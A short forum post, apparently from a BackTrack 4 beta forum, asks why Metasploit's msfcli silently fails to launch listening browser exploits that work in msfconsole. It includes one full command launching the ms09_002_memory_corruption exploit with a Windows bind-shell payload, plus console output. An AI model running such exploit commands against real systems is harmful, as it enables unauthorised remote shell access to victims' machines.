This seems more of a metasploit issue than a bt4b issue, but thought I should post here anyway.

I am running bt4b installed in VMWare (note, I am not using the proper VMWare image becuase my version of vmware workstation is out of date).

The problem:

Trying to launch any exploit via msfcli that uses a "listening" exploit, (I.E the majority of client-side browser exploits), msfcli just fails as below (no errors), however running the same exploit with same parameters in msfconsole works and the exploit is launched and ready for a connection.

root@bt:/pentest/exploits/framework3# ./msfcli exploit/windows/browser/ms09_002_memory_corruption SRVPORT=80 URIPATH=test PAYLOAD=windows/shell/bind_tcp LPORT=4444 E


msf exploit(ms09_002_memory_corruption) > exploit
[*] Exploit running as background job.

msf exploit(ms09_002_memory_corruption) >
[*] Started bind handler
[*] Using URL:
[*] Local IP:
[*] Server started.